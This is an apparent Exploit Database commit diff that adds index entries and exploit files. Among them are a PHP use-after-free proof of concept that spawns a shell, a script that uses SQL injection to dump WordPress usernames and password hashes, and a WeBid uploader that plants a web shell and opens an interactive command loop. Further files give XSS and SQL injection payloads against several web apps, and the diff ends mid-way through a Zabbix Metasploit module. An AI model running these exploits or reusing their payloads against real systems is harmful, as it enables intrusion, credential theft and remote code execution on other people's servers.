Update: 2015-02-25

21 new exploits
This commit is contained in:
Offensive Security 2015-02-25 08:37:34 +00:00
parent 620cbde9f3
commit d944419211
22 changed files with 1556 additions and 1 deletions

View file

@ -22055,7 +22055,7 @@ id,file,description,date,author,platform,type,port
24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 nativeHelper.apply - Remote Code Execution",2013-04-08,agixid,linux,remote,0
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0
24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0
24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69
@ -32499,6 +32499,8 @@ id,file,description,date,author,platform,type,port
36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0
36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0
36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection Vulnerabilities",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
@ -32513,6 +32515,7 @@ id,file,description,date,author,platform,type,port
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow - MKD Command",2015-02-14,R-73eN,windows,remote,0
36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
@ -32520,6 +32523,8 @@ id,file,description,date,author,platform,type,port
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0
36087,platforms/php/webapps/36087.txt,"Fancybox for WordPress 3.0.2 - Stored XSS",2015-02-16,NULLpOint7r,php,webapps,0
36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80
36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
@ -32578,3 +32583,19 @@ id,file,description,date,author,platform,type,port
36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 Multiple SQL Injection Vulnerabilities",2011-09-21,"kurdish hackers team",php,webapps,0
36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (MSF)",2015-02-23,"Pablo González",php,webapps,80
36158,platforms/php/dos/36158.txt,"PHP DateTime Use After Free Vulnerability",2015-02-23,"Taoguang Chen",php,dos,0
36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF Vulnerability",2015-02-23,"Eric Flokstra",php,webapps,80
36162,platforms/php/webapps/36162.txt,"TWiki <= 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0
36163,platforms/php/webapps/36163.txt,"TWiki <= 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0
36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0
36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0
36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10, WordPress 3.1.x, DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0

Can't render this file because it is too large.

137
platforms/php/dos/36158.txt Executable file
View file

@ -0,0 +1,137 @@
Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]
Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.1.29 - Release Date: 2015.2.20
A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
static int php_date_initialize_from_hash(php_date_obj **dateobj,
HashTable *myht)
{
zval *z_date;
zval *z_timezone;
zval *z_timezone_type;
zval tmp_obj;
timelib_tzinfo *tzi;
php_timezone_obj *tzobj;
z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
if (z_date) {
convert_to_string(z_date);
z_timezone_type = zend_hash_str_find(myht, "timezone_type",
sizeof("timezone_type")-1);
if (z_timezone_type) {
convert_to_long(z_timezone_type);
z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
if (z_timezone) {
convert_to_string(z_timezone);
...
static int php_date_timezone_initialize_from_hash(zval **return_value,
php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
zval **z_timezone = NULL;
zval **z_timezone_type = NULL;
if (zend_hash_find(myht, "timezone_type", 14, (void**)
&z_timezone_type) == SUCCESS) {
if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
convert_to_long(*z_timezone_type);
if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone)
TSRMLS_CC)) {
return SUCCESS;
}
}
}
return FAILURE;
}
The convert_to_long() leads to the ZVAL and all its children is freed
from memory. However the unserialize() code will still allow to use R:
or r: to set references to that already freed memory. There is a use
after free vulnerability, and allows to execute arbitrary code.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.
<?php
$f = $argv[1];
$c = $argv[2];
$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";
$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
$x = unserialize($data1);
$y = $x[2];
// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";
$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";
$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
$z = unserialize($data2);
function ptr2str($ptr)
{
$out = "";
for ($i=0; $i<8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line, then any PHP code can be executed:
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)

85
platforms/php/webapps/36061.php Executable file
View file

@ -0,0 +1,85 @@
<?php
/*
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
*/
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
$fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
$prefixCurl = curl_init($fullURL);
curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($prefixCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
$tableName = str_replace('####', '', $tableNames[0]);
echo 'tableName: '.$tableName.'<BR/>';
$fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
$usersCurl = curl_init($fullURL);
curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($usersCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
$from = stripos($result, PATTERN_TO_SEARCH_USERS);
$to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
$result = substr($result, $from, $to-$from);
echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
}
else
{
echo 'Table name fetched, but not users - try to rewrite exploit :-(';
}
}
else
{
echo 'NOT vulnerable :-(';
}
}

45
platforms/php/webapps/36086.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: WonderPlugin Audio Player 2.0 Blind SQL Injection and XSS
# Date: 20-01-2015
# Software Link: http://www.wonderplugin.com/wordpress-audio-player/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
wp_ajax_save_item() is accessible for every registered user (admin privileges are not checked).
save_item() uses is_id_exist() in which $id is not escaped properly.
2. Proof of Concept
Login as standard user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
<input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)">
<input type="submit" value="Hack!">
</form>
This SQL will check if first password character user ID=1 is "$".
If yes it will sleep 5 seconds.
For XSS use:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
<input type="hidden" name="item[id]" value="1">
<input type="text" name="item[name]" value='<script>alert(String.fromCharCode(88,83,83));</script>'>
<input type="text" name="item[customcss]" value='</style><script>alert(String.fromCharCode(88,83,83));</script>'>
<input type="submit" value="Hack!">
</form>
It will be visible on every page where shortcode wonderplugin_audio is used and also in admin panel:
http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items
http://security.szurek.pl/wonderplugin-audio-player-20-blind-sql-injection-and-xss.html
3. Solution:
Update to version 2.1

28
platforms/php/webapps/36087.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: seidbenseidok@gmail.com
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/
vulnerable code [fancybox.php]:
342. if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
343.
344. if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
345.
346. $settings = stripslashes_deep( $_POST['mfbfw'] );
347. $settings = array_map( 'convert_chars', $settings );
348.
349. update_option( 'mfbfw', $settings );
350. wp_safe_redirect( add_query_arg('updated', 'true') );
exploit:
<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
<input type="text" name="action" value="update">
<input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
<input type="submit" value="Send">
</form>

142
platforms/php/webapps/36154.txt Executable file
View file

@ -0,0 +1,142 @@
Document Title:
============
Beehive Forum v1.4.4 Stored XSS Vulnerability
Author:
==============
Halil Dalabasmaz
Release Date:
===========
23 Feb 2015
Product & Service Introduction:
========================
Beehive is an open-source project for creating a high-configurable
frame-based discussion forum.
Vendor Homepage:
=================
http://www.beehiveforum.co.uk
Abstract Advisory Information:
=======================
BGA Security Team discovered an Stored XSS vulnerability in
Beehive Forum v1.4.4
Vulnerability Disclosure Timeline:
=========================
20 Feb 2015 - Contact with Vendor
21 Feb 2015 - Vendor Response
22 Feb 2015 - Vendor Fix
23 Feb 2015 - Confirm Fix
23 Feb 2015 - Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Beehive Forum v1.4.4
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
Stored XSS
Tested On:
============
Iceweasel & Chromium
Sample Payload:
=================
http://"><script>alert('XSS');</script>
Proof of Concept (PoC):
=======================
Proof of Concept
The vulnerable inputs are "Homepage URL", "Picture URL" and "Avatar URL" on Profile Section.
Following line contain the vulnerability in edit_prefs.php;
if (isset($_POST['homepage_url'])) {
$user_prefs['HOMEPAGE_URL'] = trim($_POST['homepage_url']);
$user_prefs_global['HOMEPAGE_URL'] = (isset($_POST['homepage_url_global'])) ? $_POST['homepage_url_global'] == "Y" : true;
if (strlen(trim($user_prefs['HOMEPAGE_URL'])) > 0) {
if (preg_match('/^http:\/\//u', $user_prefs['HOMEPAGE_URL']) < 1) {
$error_msg_array[] = gettext("Homepage URL must include http:// schema.");
$valid = false;
} else if (!user_check_pref('HOMEPAGE_URL', $user_prefs['HOMEPAGE_URL'])) {
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Homepage URL"));
$valid = false;
}
}
}
if (isset($_POST['pic_url'])) {
$user_prefs['PIC_URL'] = trim($_POST['pic_url']);
$user_prefs_global['PIC_URL'] = (isset($_POST['pic_url_global'])) ? $_POST['pic_url_global'] == "Y" : true;
if (strlen(trim($user_prefs['PIC_URL'])) > 0) {
if (preg_match('/^http:\/\//u', $user_prefs['PIC_URL']) < 1) {
$error_msg_array[] = gettext("Picture URL must include http:// schema.");
$valid = false;
} else if (!user_check_pref('PIC_URL', $user_prefs['PIC_URL'])) {
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Picture URL"));
$valid = false;
}
}
}
if (strlen(trim($user_prefs['AVATAR_URL'])) > 0) {
if (preg_match('/^http:\/\//u', $user_prefs['AVATAR_URL']) < 1) {
$error_msg_array[] = gettext("Avatar URL must include http:// schema.");
$valid = false;
} else if (!user_check_pref('AVATAR_URL', $user_prefs['AVATAR_URL'])) {
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Avatar URL"));
$valid = false;
}
}
Solution Fix & Patch:
================
Upgrade the the script.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. BGA or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of
business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2015 | BGA - Bilgi Güvenli?i Akademisi

126
platforms/php/webapps/36155.php Executable file
View file

@ -0,0 +1,126 @@
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit
Date : 20 February 2015
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.webidsupport.com/
Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
Version : 1.1.1
Tested on : Window and Linux
#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################
/ajax.php
/inc/plupload/examples/upload.php
#####################################################
DESCRIPTION
#####################################################
This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+----------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n+----------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
print "\n\nExploiting...";
sleep(2);
print "Waiting for shell...\n";
sleep(2);
http_send($host, $packet);
$packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
while(1)
{
print "\nWebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>

49
platforms/php/webapps/36156.txt Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection
# Date : 20 February 2015
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://clip-bucket.com/
# Software Link : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip
# Version : 2.7.0.4.v2929-rc3
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################
SOFTWARE DESCRIPTION
####################
ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community.This script comes with all
the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any
other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was
first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable &
scalable media distribution platform with latest social networking features, while staying light on your pockets.
Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video
management needs.
##################################
VULNERABILITY: Blind SQL Injection
##################################
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
= POC =
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9 => True Condition
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9 => False Condition (Item does not exist.)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

86
platforms/php/webapps/36157.rb Executable file
View file

@ -0,0 +1,86 @@
##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
# http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
# http://seclists.org/fulldisclosure/2013/Sep/151
# http://www.cvedetails.com/cve/CVE-2013-5572/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ldap_bind_password Zabbix CVE-2013-5572',
'Description' => %q{
Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
},
'License' => MSF_LICENSE,
